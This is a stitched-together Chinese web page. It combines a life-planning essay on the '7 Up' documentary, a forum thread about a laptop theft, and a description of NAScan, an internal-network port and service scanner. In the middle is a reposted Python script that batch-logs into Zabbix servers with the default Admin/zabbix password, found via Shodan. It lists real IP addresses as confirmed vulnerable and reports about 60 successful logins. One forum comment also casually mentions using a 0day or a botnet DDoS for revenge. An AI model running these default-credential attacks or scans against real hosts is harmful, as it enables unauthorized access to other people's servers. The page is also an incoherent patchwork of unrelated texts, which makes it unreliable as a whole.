万小时定律:想要从一个普通人成长为该领域的专家,至少需要 1 万小时的练习(按每天工作 8 小时,一周五天,大约要五年)。   可从业超过五年甚至十年的程序员多了去了,有几个成了比尔·盖茨、扎克伯格?   大水漫灌式的学习、练习,远远不如喷灌、滴灌式的刻意练习、学习来的高效。   这种刻意学习需要你在对自身问题有深刻了解的情况下,通过实践不断地加深对自己和所处领域的认知,同时不断的接收来自别人的反馈(可以主动询问比你优秀、厉害的大牛),规划自己的学习计划。   我们这里可以引入“改善率”的概念,即重要的不是你学习了多少新东西,而是你改正了多少错误,弥补了多少短板,根据你的需要学习了多少新东西。   亿万富翁马克·安德森曾在谈到扎克伯格时说:如果你有机会同扎克伯格这样伟大的 CEO 待在一起,你就会发现,其实他们每个人都是百科全书式的专家,他们对本行业或者对其他领域都有很深的了解,这些都是通过刻意学习、训练得来的。   要取得成功,重要的是“改善率”,有针对性的解决自己的问题,有重点地了解相应的知识,而非宽泛的学习。   建议:   (1)尽可能多的阅读行业报告、公司财报,对相关领域有通盘了解,知道自己需要了解但不了解什么,有针对性的学习、练习。   (2)每周定期自我总结,不管是工作上的还是生活上的,要敢于发现自己的问题,然后想尽一切办法改正。   (3)找一个段位比自己高且愿意帮助自己的人做自己的导师,并建立相应的反馈机制,多多听取对方的意见。有句话很好:迷茫时不要求助于最亲近的人,找身边最有智慧的人。 4、对家庭的规划   除了我们自己的身体之外,能够陪伴我们最久,给予我们最大支持的就是我们的家庭了。就像豆瓣网友“菜”说的:一生中跟我们有密切联系的人应该不会超过 100 个人,甚至 30 - 60 人这个数量级别都是正常的,亲人就是其中最密切的人之一。   有很多人可能根本没有意识到家庭对人的影响有多大:电影里一个叫 Sue 的女孩,离婚后自己带着孩子生活,经历了一段人生低谷,后来再婚后夫妻生活很和谐,事业和生活也渐渐有了起色。   另一个女孩则嫁了两次离了两次,生下的几个孩子也都因为种种原因没有上大学,自己身体不好还遭遇了一系列的情感打击,一直只能靠救济金过活。   其实不仅仅女人是这样,男人找到一个好的妻子对人生的改变也是及其显著的。女人找老公是托付终生,男人找老婆又何尝不是呢?   美国作家约翰·威廉斯的小说《斯通纳》中的主人公威廉斯·斯通纳就是一个很鲜明的例子。作为大学老师,本来还算是年轻有为的他,因为跟妻子之间贯穿始终的冷漠,在妻子压力下跟他疏离的女儿,活力全无的家庭耗尽了他对生活的最后一丝激情,最终只好孤独的面对死亡。   一段糟糕的婚姻牵扯甚广,能够影响你的心情、事业、父母、生活,而且即便是你遇到了下一份感情,你也要费心费力的处理上一段的遗留问题,而且如果已经有了孩子,还要应付你失败的婚姻给孩子带来的伤害。   所以,在选择另一半成就你的家庭时一定要慎之又慎,要仔细地考虑什么对你是最好的,什么是对你的另一半最好的。在处理感情问题时,也可以适当的学一些技巧,避免因为自己没有处理矛盾的经验伤害了自己珍惜的感情。   建议:   (1)找一个能聊的来、有共同志向,能够互相包容的另一半,在一起的时候相互珍惜,别“作”。   (2)要尊重(自尊和尊重别人),要理解,要平等,需要跪舔的不是爱情,更不会长久。   (3)最多生两个孩子,要知道你的人生也属于你自己,不要把一辈子都放在孩子身上。   (4)尽可能多挣钱提高生活水平,比如做斜杠青年,如果不行,量入为出。   (5)学会攒钱、理财、买保险。   总之,有些人生规划还是越早做越好,很多时候当你醒悟过来,到底是什么把你和别人区分开来的时候,你往往已经没有追赶的余地了。 关于《人生七年》   《人生七年》(英文原名《7 up》)由迈克尔·艾普特执导,Bruce Balden、Jacqueline Bassett、Symon Basterfield 等出演的一部由 ITV 出品的纪录片。   迈克尔·艾普特从 1964 年开始拍摄的纪录片系列的第一部。   迈克尔·艾普特在 1964 年为英国 BBC 电视台拍摄了记录片《7 Up》,采访来自英国不同阶层的十四个七岁的小孩子,他们有的来自孤儿院,有的是上层社会的小孩。   此后每隔七年,艾普特都会重新采访当年的这些孩子,倾听他们的梦想,畅谈他们的生活。四十九岁知天命,看尽岁月流逝,看穿沧海桑田。   本片综合了被访者七岁、十四岁、二十一岁、二十八岁、三十五岁、四十二岁、四十九岁及五十六岁多年的访问精华。   《人生七年》荣获2006年英国电影学院奖和金卫星奖提名。 剧情简介   人生七年,又称 7 up ,是一部由 ITV 出品的纪录片,于 1964 年开始记录 14 位英国的七岁儿童的生活,到目前为止,该纪录片已经跨越 49 年(每 7 年一集)并在 ITV 和 BBC 播出。   2005 年英国第四台将该系列纳入最伟大的 50 部纪录片名单中。   被选中的孩子们代表了当时英国不同社会经济背景的阶层,并做出了明确的假设,即每个孩子的社会阶级预先决定了他们的未来。   每隔 7 年导演迈克尔·艾普特从 14 位参与拍摄的参与者生活中取材。   该系列的目的是按当初 7 Up 中的“我们把这些孩子们聚到一起,因为我们想在 2000 年时看看英格兰的一个缩影,2000 年时的工人和主管,现在都只有七岁。” 精华影评   以下内容摘录自:我是如何看完纪录片《人生7年》的?(附精华总结) 前言   兄弟偶然的介绍,然后这两天我一口气看完这部纪录片,接着立刻搜刮了豆瓣和知乎上所有精华的影评及文章,总计17个文档,来自数十个影评和知乎分享作者,总计155216字,然后分21个层面浓缩成最后这篇5849字的文章。   关于人生我们总是有那么多困惑、迷茫,尤其是做选择的时候,这也是为什么我花那么多时间来整理的原因;   不管你现在处于什么年龄段,我希望以后少点烦恼,面对机会,多一点选择的空间,这就是我想要的;   每一条放在某一个人身上都是血淋淋的教训,也是数十位作者的荟萃,所以如果有心请先看完纪录片再回来看,那时候你感受到的就不会是鸡汤,而是具体的行动指南和指引;   整个纪录片像是一面大海,看起来很平淡,里面却是暗潮涌动。 一、关于人物 1.John   21岁时的观点:人们总以为他们这个阶层的人生就是顺风顺水,想去哪所学校读书就去哪所学校,一看起来都是那么的顺理成章。   但是人们并没有看到那些挑灯夜战的日子,那些刻苦努力的日子。   这是社会对他们的误解。   真的唯有努力,才能让这一切看起来毫不费力。 2.Tony   尽管出身贫苦,但他永远乐观坚强,永远对生活有激情。   有敢想敢做的性格(导演问,但是你没有成功呀,他说至少我都试过了。),没有眼高手低,去幻想那些自己遥不可及的高度,一切的“我想”都是在合理的范围内。   21岁意识到自己不适合骑师,放弃了,去学出租车,后来如愿成为出租车司机。   但问到他人生最开心的时刻,还是当骑师的时候和自己的偶像同场竞技,那种骄傲,那种满足,尽管没能做出成就,但是感激曾经拥有。   一个人对于自己生活有一个美好愿景是多么重要的一件事。   这个参数直接决定了人生轨迹,它甚至不和其他参数相关,它单纯地决定了他们的人生之路。 3.Bruce   小天使,虔诚的基督徒,家境很好。   很单纯,没有偏见,乐于付出,生活简单幸福。 4.John   典型精英阶层子弟,一路私立学校,牛津读的法律,后来去了法庭,娶的是前保加利亚大使的女儿,他自己的曾祖父就曾是保加利亚首相,可见背景之雄厚。   他一直拥有的是一种经典而高贵的贵族思维,就是自己确实比别人拥有更多,但就是要承担更多责任,就是要凭着自己的背景和能力对社会做更多的贡献。 5.Andrew   与John类似,精英阶层子弟的道路看起来确实一帆风顺,他也对阶级没有太多看法,只是觉得,家里能给孩子的,最重要的还是好的教育,好的教育没人能夺走。 6.Neil   正是因为在年轻时候就自缚双手,Neil才失去了和他人、这个社会、这个世界的联系,一生在物质上、精神上、感情上都陷入了孤立无援的状态。   在21岁的时候他说自己的人生太缺少障碍,我理解他也希望自己能坚强地忠于自己的愿景,但他没有做到。   他本有很多机会,但他太轻易就放弃了。 二、关于阶级   1.想要改变自己的阶级,从影片中展现出来的似乎只有从好好读书来实现了(现在中国的真实写照)。   幸运的是在我们国家,现在这个时代,中下阶级正面临着频繁快速的洗牌,如果勤快一点,机灵一点,我们这一代跨越阶级是可以实现的,尤其是从一无所有到略有田产,再下一代,就需要我们这代来引导教育和看他们自己的命运了。   普通阶层的孩子大多没有上大学,工薪阶层,结婚很早,人生很早就固定在了普通阶层中,甚至他们的孩子也很少有上大学的,人生轨迹与他们并没有太大不同;   而精英阶层,从小的道路非常清晰,一步一步,名校毕业,踏入律师之类的职业,孩子也是名校,就算年轻的时候彷徨过,优越的背景也使他们彷徨之后依然有机会重新回归富裕的生活。   2.人生要过得怎么样,出身决定了起点,但绝不决定你的终点,过程看个人,抛开家庭背景、父母这些先天、个人无法改变的因素,你尽自己个人的力量走了多远,超越了你原有的阶层多远。   3.如何做好现在的自己才是我们应该考虑的事情,毕竟出身不可选择。   4.身处什么样的阶层就选择什么样的生活,可以努力,但不要强求。只追求属于你自己的生活。   5.精英阶层固然生活更舒适,但是社会对他们的期望值也更高,所以他们和梦想的相对距离,和底层与梦想的相对距离其实是一样的。 三、关于亲情   28-35岁之间,好几位都承受了父亲或母亲去世的痛苦。为了不在未来后悔,还是请抽时间多和父母说说话,多陪伴他们。 四、关于观念   1.没有任何一个人能完全站在他人的角度体会别人的人生。所以,请不要轻易对别人的人生下定义下结论。   2.不要妄想冻结时间。没有人能抵抗时间的流逝。   3.我最大的错误在于忽视了现实的复杂性,肤浅的认知和自不量力地扮演“上帝”的角色,对他人的生活做出评判。我相信这也是很多人犯的错误,我们不能仅仅就凭一些片段就武断地做出评价、给别人的人生下了定义,这是对他人人生的一种不尊敬,反过来会换来别人对自己人生的不尊重。看完影片后,脑中闪出这么一句话:最终能对你的人生做出总评的人还是你自己。   4.可是就中国而言,对大学教育真的很失望,抛开教育,可能更多的还是需要个人努力,永远不要停止学习,永远不要抛弃对世界的好奇心。 五、关于教育   1.如果没有机会接受高大上的学校教育,那么进入社会以后,就积极接受社会所带来的教育,保持上进学习的态度,乐于实践,为自己想要的生活而努力。   2.Andrew的那句“人无法确定能留给下一代什么财物,但至少可以确定,一旦给了他们好的教育,他们终生都可以受用”   3.不同人之间的差异又在很大程度上由教育程度和教育经历的不同塑造。因此如果非要说有什么促进社会公平的良药,那么教育定当是第一位。 六、关于健康   1.身体是最大的本钱,积极的运动,锻炼身体,合理饮食,保持健康的体魄。   2.光生活在有钱人的家里,其实还是不够的,还要有足够的教育水平,这样的家庭教育出来的孩子才是真的有教养,有眼光,并且谦虚低调。   3.一个乐观、向上的精神离不开优渥的物质生活基础,同样,优渥的物质生活,需要的是一个健康的体魄。 七、关于家庭   1.一个稳定的家庭环境,不管是小时候与父母组成的家庭,还是长大后自己通过婚姻组成的家庭,真的都太重要了。   2.家族能带给你不一样的背景,不一样的野心和信念,不一样的未来机遇。   3.珍惜身边的人,孝顺父母,包容自己的伴侣,与孩子保持亲密的关系,营造快乐向上的家庭氛围。树欲静而风不止,子欲养而亲不待。   4.孩子的成长不是学校的事,不是孩子一个人的事,而是一个家庭的事,良好的生活习惯,做人道理,坚强的意志,这些都是要靠父母去培养的。   5.父母能给子女最好的成长礼物是陪伴。 八、关于幸福   1.大家幸福的来源很大部分源于家庭,源于承担责任。而更多人的更大满足感,源于付出,源于奉献。   2.对一个人来说,最大的幸福就是自己和家人健康,婚姻幸福,儿孙满堂。在这个基本幸福之外,有野心的人期待着实现更大的自我价值,惠及他人。幸福的生活都相似,不幸的生活,各有各的不幸。   3.一个人幸福不幸福,不仅仅在于事业上是否取得了成功,而在于是否有陪伴自己的家人。   4.生活就像一盒巧克力,你永远不知道下一颗是什么,但是千万别失望,最好的总会到来。以及所谓的成功幸福根本没有量化的标准。   5.人们总是倾向于追求“别处的风景”,却常常在失去了熟悉事物的时候才追溯它的美好。   6.幸福也许只是一种态度。   7.幸福就是你的能力大于你的欲望。就是如果你能让自己过上比你预期好的生活,你就会幸福。比如你一个月能挣10000,但是你对生活的预期就是1000的预期,那你就幸福。如果你一个月挣1000,但是你对生活的预期只有10,那你也幸福。如果你能挣10000,但是你的预期是100000,那你就不幸福了。   8.至于金钱是否能让人生活的幸福一事,我是这么认为的:并不是钱越多就一定越幸福,但是钱少大多数不幸福。在一定的范围之内,钱越多越幸福。超过一定数值,幸福和钱多少关系不太大, 九、关于资源   1.80%的富人阶级的孩子能够打好手上的一副好牌,懂得把握自己拥有的机会,相对轻松地实现自己的梦想,其余20%却浑浑噩噩,浪费一手好牌,沦为浪荡的败家子;20%的穷人阶级的孩子意识到上进的重要性,刻苦努力希望打破阶级壁垒,其余80%却只能平平淡淡的讨生活,活在自己的小格局里。   2.世界上真正的赢家往往是那些拥有更多资源的人。这是一条残酷的法则。但不得不承认,这就是现实。   3.家庭出身好的人,他们往往很早就领悟到自己人生的使命。   4.恰如“马太效应”,强者会拥有更多的资源,则愈加强大;而弱者却面临资源的稀缺,则愈加弱小。这些资源中尤为明显的是“教育资源”,同样7岁的孩子,有孩子在读金融时报,有孩子却只求在福利院中不再挨打;   案例:聊到关于高考的话题,我说:“怪不得你高中压力那么大,毕竟从小到大,你的家庭给你提供了最优秀的社会资源,你没有理由考的差。”在同一个尺杆下,我们都有跳过1米5的能力,但是种种原因,你比我的起点高了30公分,你的梦想可以是跳过1米8,我的梦想只能是跳过1米5。如果我和你付出同样的汗水,我永远无法超越你。如果你和我付出同样的汗水,你取得的成绩也不配嘲笑我,当你在嘲笑别人的时候,你也会惊愕,原来有的人起点就是1米8。 十、关于爱情   1.永远对爱情抱有希望,永远不要觉得自己等不来一个对的人。   2.我想到了最浪漫的事就是和你一起慢慢变老;   3.任何一段long relationship,势必都需要足够多的tolerance和inclusiveness,让彼此成为最适合的那个人吧,任何一方放弃努力,那么就没有办法work out。而像经历了37年婚姻的Lynn说的那样,好的关系是“两个人一起成长”。 十一、关于选择   1.人生真的有很多可能性,各不相同,就像一首诗里提到的丛林里的两条路。人生对于很多人来说,就是很多条路,但又似乎有注定的轨迹。这一切在于你的选择,残酷的地方在于,你只能选择其中的一种。所以该好好问问自己,什么是自己真正想要的。   2.就算每个人的背景、环境、性格千差万别,生活其实永远有无限种展开的方式,并且很大一部分取决于自己的选择。你想要成为一个什么样的人。你想要过一个什么样的生活。我们现在走的每一步,正是过去无数步累积而成的结果。不能回头,所以请对自己的选择负责。   3.选择权永远在于你自己,无论是情绪,还是困惑,无论是困难还是,工作还是未来,你永远有更好选择,懒,本身也是你,另外一个选择罢了,既然选择了,就要承受责任,选择以后带来的后果。   4.不论什么时候,你感觉迷茫,不知道该怎么办,该做什么时候,就坐下来和自己内心谈谈,问问内心那个自己到底要去做什么,然后去做!   5.当你有了钱,你就有更多的机会去接触更多的可能性,然后选择你最喜欢的一种方式,沙滩晒太阳只是其中的一种而已。如果你没有见过世面,那在你的世界里,就只有晒太阳。 十二、关于成长   1.年轻时,当生活中有变故时,当遭受巨大打击时,一定要顶住,否则一辈子的命运可能就会急转直下。Neil就是例子。   2.还是要靠自己的信念,想通了也就那么回事。   3.生活是自己过的,真当生活过不下去的时候自然会改变;路是自己走的,真当走不下去的时候自然会拐弯,何必总是听外人指手划脚。生活面前,谁都不会是备胎。   4.现在有人说,你连自己的体重都控制不了,你连冬天早晨起床都起不了,你如何能有毅力去控制人生呢?   5.其实人没有自己想象的那么强也没有自己想象的那么弱。最终大家都会适应环境。“原来河水既不像老牛说的那么浅,也不像小松鼠说的那么深。”   6.我们一直活得很忙碌,忙到从来没有仔细的审视他人和自己的一生,但凡听过的以一生为周期的故事,要么是名人列传,要么是传说故事,却从没一个属于我们身边这样的一些平凡人的。突然的改变,不多。不过循序渐进的变化,是有可能的。想要得到更好的生活,需要努力,需要辛苦付出。   7.成长,就是承担责任的过程。   8.尽可能每一天都活得像一张白纸。 十三、关于婚姻   1.不要生太多孩子,结婚前要看对人,不要眼高手低,不要肥胖。   2.过早结婚现在看来还是有很多弊端的,当一个人的价值观还未完全形成,且拥有的资本还不足以支撑一个家庭的时候,结婚固然是稳定了下来,但也同时成为了年轻人的一个羁绊,而有了小孩就必须花费更多的精力去抚养他们,在20几岁这个需要拼搏的年纪里,就更难平衡家庭和事业。   3.那些结婚的人基本都是找的是门当户对阶级的人,这很正常,一个人在自己所属的阶级里有更广泛的人群交集和价值共鸣。 十四、关于工作   1.工作不仅在金钱上会给人保障以建立良好的物质基础,也能增加人的自我价值感。   2.工作就是在处理我与自己的关系。通过工作,能够养活自己和家人、能够培养自信、能够证明自我价值,如果在工作上无法做到以上几点,那就要像片中人那样甘于现状,从别处去找;如果现在的工作能够有所发展,就要积极去学习、提高,去增加自己挣钱技能,去寻找工作的价值和意义。   3.一个人要有一个贯穿一生的职业,否则只能换零工做苦力一辈子。 十五、关于人生   1.阅读人生,总让人唏嘘不已,很恐怖的是,人生的每一个七年,都会改变一个人,也有许多人不会被改变。   2.人生无非就三件事:多于少、苦与乐、生与死。   3.在人生这场长跑中,你能够过得如何,跑得多远,应该是无数个XXX慢慢累积起来的,并非一蹴而就。   4.在既定已有的环境活出最好的自己才是成功。   5.机会成本只有一件,就是时间。   6.天赋比你好固然可怕,更可怕的是天赋好的人比你还努力。   7.《人生七年》和《浮生一日》给我们一个机会,让我们跳出自己的生活,以一个局外人的身份,看看我们身处的世界。   8.你看的越广,你选择就越广。你看的越高,你势必更容易攀上高峰。   9.过往已经无法改变,趁年轻,去更多的地方,开拓自己的眼界。无需强求,尽力就好。   10.人生对待你的态度很大程度反应的是你对待人生的态度。   案例:因为最近正好有位亲戚来北京找工作,跟他聊天的时候,发现他没有明确的目标。想找份稳定而又收入不错的工作,却发现没有一技之长,很被动。做生意,也没有经验。这样辗转反复,只能黯然离京。我在送他走的时候,说道,希望你能给自己设定个目标,然后朝着目标努力。不知道,他能否可以从这次进京的失败经历中悟到一些道理。   体会:人生不管出身如何,个人对自己人生的清晰的目标至关重要。有目标,按部就班,生活不会差到哪里去。 十六、关于性格   除了母体的家庭环境,性格是重塑人生的最重要的一张牌。 十七、关于规划   人生的规划很重要。什么样的年纪就应该做相应的事情。好好读书的时候就好好读书,而不是过早的辍学去打工,过早结婚生子;该谈恋爱,结婚的时候就该认真的寻找自己的伴侣; 十八、关于精神世界   培养自己的正能量,积极的自我暗示,学会感恩,乐于付出,做一些有社会价值的事情,充实自己的精神世界。 十九、关于修养   1.注意你的想法,因为它能决定你的言辞。注意你的言辞,因为它能主导你的行为。注意你的行为,因为它能变成你的习惯。注意你的习惯,因为它能塑造你的性格。注意你的性格,因为它决定你的命运。   2.一个人无论成绩好坏与否,品行是关键!道德可以弥补能力的缺陷,而能力却难以掩盖道德的缺陷。   3.要做一个认真的人,一个真诚的人。 二十、关于经历   童年时期的经历会对人产生深厚的影响。 二十一、关于财富(思维)   穷人的孩子普遍认为:钱够用就行,要能够维持生活。   富人的孩子普遍希望:不要迫于生计,要有足够的金钱,这样才能做自己喜欢做的事情。   所有的伟大都只源于,一个勇敢的开始,   穷人之所以是穷人,其中一个主要的原因就是他们只嫉妒富人的财富,却很少去思考富人是如何成为富人的。 相关影片   《飞越疯人院》One Flew Over the Cuckoo’s Nest (1975)   《楚门的世界》The Truman Show (1998)   据报道,受本片影响,一位名叫Sue Williams的女导演正在拍摄试图反映中国人生变化的纪录片Making It。该项目将于2020年结束。据说2008年奥运会之前该片已经播出一部分。不知能否看到,是什么角度。这一类跨越漫长时空的纪录片现在有个名称,叫“经度纪录片”longitudinal documentaries,也许真的如某些媒体所说,这种拍摄是对电影形式一种最高尚的运用。 关于《人生规划》   25岁前,一定要完成哪些人生规划?   然而现实却是,大部分人 24 岁都刚刚大学毕业,对社会、对人生有个鸡毛认识、能规划个锤子……   底层穷人都在还生存的温饱线上挣扎,何谈规划?   阶级起跑线差距悬殊,寒门再难出贵子。(做电子货币、做黑产、做各类灰色收入一夜暴富的大佬当我没说……) 关于《命运规划局》   对命运的解答,对爱情的定义。   人生是一个容器,要达到“满足”的心理状态,并非只有一种途径,可以是爱情,事业,家庭,或者别的什么。   所谓的规划,不就是我们的人生理想。   而所谓的后果,不就是热血腾沸之后的归于平淡。   如果你知道自己的理想有实现的一天,你还会选择平淡么。充满激情的跌宕人生,果真是你真正想要的么。 关于结论、关于很多   何谓规划?何谓人生?何谓生死?   人生没有对错,只有选择。   人生没有标准答案,成功的标准不适合每一个人。 相关影视   人生七年1 Seven Up! (1964)   人生七年2 7 Plus Seven (1970)   人生七年3 21 Up (1977)   人生七年4 28 Up (1984)   人生七年5 35 Up (1991)   人生七年6 42 Up (1998)   人生七年7 49 Up (2005)   人生七年8 56 Up (2012)   人生七年9 63 Up (2019)   人生七年10 70 Up (2026),我们还能等得到么?   《飞越疯人院》One Flew Over the Cuckoo’s Nest (1975)   《楚门的世界》The Truman Show (1998)   《这个男人来自地球》The Man from Earth (2007)   《命运规划局》The Adjustment Bureau (2011)   《三和人才市场 中国日结1500日元的年轻人们》(2018)

2018/9/14
articleCard.readMore

zabbix初始口令批量检测小脚本

zabbix初始口令批量检测小脚本 xyntax | 2016-04-20 12:57 看到这漏洞,WooYun: 奇虎360某IP服务器zabbix弱口令 写了个小脚本做批量。 从shodan拿到国内400+ zabbix的IP,跑出来60个: 源码(含数据): https://github.com/Xyntax/POC-T/blob/master/module/zabbix_wp.py # coding:utf-8 import requests from bs4 import BeautifulSoup """ zabbix 默认口令检测 支持两种zabbix版本 Admin/zabbix 目标发现:shodan Set-Cookie: zbx_sessionid country:cn cdxy 16.04.20 """ def _get_static_post_attr(page_content): """ 拿到<input type='hidden'>的post参数,并return """ _dict = {} soup = BeautifulSoup(page_content, "html.parser") for each in soup.find_all('input'): if 'value' in each.attrs and 'name' in each.attrs: _dict[each['name']] = each['value'] return _dict def info(): pass def exp(): pass def poc(url): h1 = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', } h2 = { 'Referer': url.strip('\n'), 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', } blacklist = [ 'incorrect', '<!-- Login Form -->', ] try: s = requests.session() c = s.get(url, timeout=10, headers=h1) dic = _get_static_post_attr(c.content) dic['name'] = 'Admin' dic['password'] = 'zabbix' # print dic r = s.post(url + '/index.php', data=dic, headers=h2, timeout=10) if 'chkbxRange.init();' in r.content: for each in blacklist: if each in r.content: return False else: return True except Exception, e: # print e return False if __name__ == '__main__': url1 = 'http://54.222.167.52/' # True url2 = 'http://180.235.64.209:8080/' # True unsuccess_url = 'http://101.198.161.9' # False print poc('http://106.2.60.133/') [原文地址] 相关内容: 大家有见过这种远程盗取银行帐号密码的情况么? 关于FTP弱口令扫描的,为什么经常见有人搞一些FTP弱口令扫描? snmp弱口令引起的信息泄漏 如何设置安全的密码 如何管理并设计你的口令 【转载】Windows 系统密码破解全攻略 国内各类 WebShell 密码大全 爆破、社工用 webshell-password 【VC源码】MySql,MsSql弱口令混合扫描利用工具 留言评论(旧系统): 1212121212 @ 2016-04-29 15:45:11 from bs4 import BeautifulSoup 我这里没有bs模块啊 本站回复: -_-!!! 1212121212 @ 2016-04-29 15:47:50 我知道了 bs4的问题了 本站回复: -_-!!! 佚名 @ 2016-05-16 11:55:07 很久没看到广告了,然后小手一点,果断暂停右上角AdBlock插件,然后愉快的欣赏广告了。 本站回复: -_-!!! 路人甲 @ 2016-06-09 11:10:19 垃圾 本站回复: 垃圾

2016/4/23
articleCard.readMore

【趣事】大家来一起柯南一下、分析下案情,迷の密室盗窃案!

大家来一起柯南一下、分析下案情,迷の密室盗窃案! Ch丶0nly | 2016-04-20 14:44 楼上朋友的笔记本丢了,只开着窗户(靠墙的窗户5楼 不至于爬那么高偷电脑)门是锁着的 锁也没被破坏 回去的时候门是正常锁着的 唯独笔记本电脑丢了(包括鼠标 电脑包之类的) 其他东西都没有翻动过的痕迹 床头包里有钱为什么没丢呢? 只是拿走了笔记本电脑 楼下也没有监控 没办法看到是谁拿走的 因为我们租住的是宾馆流动人口不大 初步怀疑是这栋宾馆里的住户所为 因为门锁未被破坏 而且小偷走的时候还把门锁上了 说明可能是有钥匙的人。 现在请大家集思广益 发挥一下你们的福尔摩斯精神! [原文地址] 各种吐槽: 1# Ch丶0nly | 2016-04-20 14:46 这种事报警也是没啥卵用 区区一台电脑 我大天朝叔叔为你所用? 2# 包包 | 2016-04-20 14:49 感觉像是他自己忘记电脑放在哪里了吧。。我是没见过入室盗窃只拿电脑,不拿现金的→_→ 3# Ch丶0nly | 2016-04-20 15:10 @包包 可是他就说丢了 我也纳闷啊 4# 雅柏菲卡 (万物有灵,切忌污损。。。。。。) | 2016-04-20 15:16 @包包 我也没见过 5# wanglaojiu (天若有情天亦老人若有情死得早,凶胎又侧漏了) | 2016-04-20 16:59 @Ch丶0nly 窗户对面是不是另外一栋楼房的天台,是的话可以从那边搭个梯子到这边窗户,人从梯子过来,从窗户进入 6# by灰客 | 2016-04-20 17:31 你朋友应该看看这个 http://baike.baidu.com/link?url=UNwJbq9XR-v9G4IGDUXWpzQgN7Z0x3ha2G70PjcBBf2HM8vPFU8GAJODvjQBRp7Myq78PbBqMykQ6DZBa0LZ3a 7# 剑芯 (大包整多两笼) | 2016-04-20 18:28 警察说过,在惯偷眼里面,1楼,5楼,30楼,100楼都没有区别。他们都是专门爬墙的好手,都能上去 8# Ch丶0nly | 2016-04-21 11:09 @wanglaojiu 窗户外面是墙 大白天的爬墙带台电脑不划算啊 电脑华锁又不是什么高端电脑 还不是新的。。。 9# Ch丶0nly | 2016-04-21 11:10 @剑芯 爬楼不划算 而且电脑不值啥钱 10# 剑芯 (大包整多两笼) | 2016-04-21 11:25 @Ch丶0nly 你手中有个0day,你打某个站分分钟。如果哪天这个站长得罪你了,你分分钟做掉他,不因为什么,就因为他惹了你。我没有这个0day,所以如果站长惹了我,我黑不下来,我就得花更长更多的时间去找很多很多的肉鸡ddos这个站,时间长,成本高,容易暴露 你和我没有爬墙的能力,觉得很难,不代表对于别人专门干这个的来说爬墙也很难。 11# Ch丶0nly | 2016-04-21 11:51 @剑芯 偷台破电脑有啥意思 不值钱啊 为这小偷智商担忧 包里有现金 居然没去翻 到底是啥原因很纳闷。。。。 12# 我还爱 (我还是那个我,我还爱那个我) | 2016-04-21 13:27 我以为你知道柯南的大结局呢 13# lxj616 (简介) | 2016-04-21 14:25 你们的思路都不对 不应该先想电脑是怎么没的 而是要想为什么这台电脑需要消失 14# Ch丶0nly | 2016-04-21 17:25 @lxj616 难道因为里头有情侣自拍? O(∩_∩)O哈哈~ 15# 小表哥 | 2016-04-23 16:08 柯南漫画我最新欢了,把开场介绍人物的合照拿来 我给你圈出来 凶手就是你! 16# 核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2016-04-23 17:53 目测熟人作案 相关内容: 反黑逆向溯源追踪之:某某某局入侵事件分析 一起网络诈骗案的风险揭示,套取用户信息、信用卡、支付宝、快捷支付洗钱 开房数据泄露案告破 警方发现嫌犯曾参与多起网络犯罪 [技术分析]利用波士顿马拉松爆炸案热点的新型APT攻击 山西破获首起“伪基站”案件 XSS解决方案系列之四:关于编码 上来吐个槽,再次侦破一宗牵扯到全国多个大型医疗集团的恶性案件! 上海伊莱美医院被黑、黑帽SEO做淘宝客,核总深入追查,揪出内鬼! 支付宝木马爆菊过程总结帖【附源码】 接上一章节,支付宝木马,后续情节【2】 接上一章节,支付宝木马,后续情节 360对你真的起作用了吗?bypass....分析支付宝网银木马,反爆菊花 揭秘诈骗千万人民币的团伙及具体位置分析 核总霸气分析“天津丽人女子医院”主站被黑、挂淘宝客、黑帽SEO全过程! 接着核总的《打击钓鱼,人人有责》之后的故事... 打击钓鱼,人人有责…… XSS挖出一个黑产团体 追查黑客姓名,邮箱,支付宝信息,惊现大规模僵尸网络,要求警方介入处理! 服务器被入侵之后,反爆1433抓鸡黑客菊花,并公布大量黑阔账号密码 耍了一个发给我网购木马的骗子~~ 流言终结者:一条错误的命令引起的血案…… 中斯警方联合行动抓获百名电信诈骗案嫌疑人 东京大学加密招生海报解密过程(内含妹子) 全国最大网银盗窃案告破:近百人两个月被盗千万 简单分析一个通过 js 劫持进行黑帽 SEO 做淘宝客的案例 电信诈骗韩国人案抓235人 涉案金额1亿多 我国警方成功摧毁特大跨国跨两岸电信诈骗犯罪集团 电信诈骗,电话营销,一响挂电话,推销平安、人寿保险,冒充朋友 广东台湾两地警方联手破获电信诈骗大案 虎门局长涉强奸女下属 牵出副局长垄断经营案 解密电信诈骗:改号平台盗用110 日拨上万电话 67名跨国电信诈骗嫌犯从菲律宾押解回到福州 黑客盯上外贸公司业务员邮箱 入侵员工电脑 跨国诈骗案 某人肉搜索的典型案例分析 一群推理神牛 中国十起真实人肉包子事件

2016/4/23
articleCard.readMore

网络资产信息扫描(F-NAScan):NAScan.py,内网渗透测试主机信息收集

网络资产信息扫描(F-NAScan) wolf (@伏宸安全) | 2016-04-14 13:00 网络资产信息扫描 在渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口,端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点: 1、轻巧简洁,只需python环境,无需安装额外外库。 2、扫描完成后生成独立页面报告。 此脚本的大概流程为: ICMP存活探测-->端口开放探测-->端口指纹服务识别-->提取快照(若为WEB)-->生成结果报表 运行环境: python 2.6 + 参数说明 -h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),ip列表文件(ip.ini),最多限制一次可扫描65535个IP。 -p 指定要扫描端口列表,多个端口使用,隔开 例如:22,23,80,3306。未指定即使用内置默认端口进行扫描(21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017) -m 指定线程数量 默认100线程 -t 指定HTTP请求超时时间,默认为10秒,端口扫描超时为值的1/2。 -n 不进行存活探测(ICMP)直接进行扫描。 结果报告保存在当前目录(扫描IP-时间戳.html)。 例子: python NAScan.py -h 10.111.1 python NAScan.py -h 192.168.1.1-192.168.2.111 python NAScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6 python NAScan.py -h ip.ini -p port.ini -n 服务识别在server_info.ini文件中配置 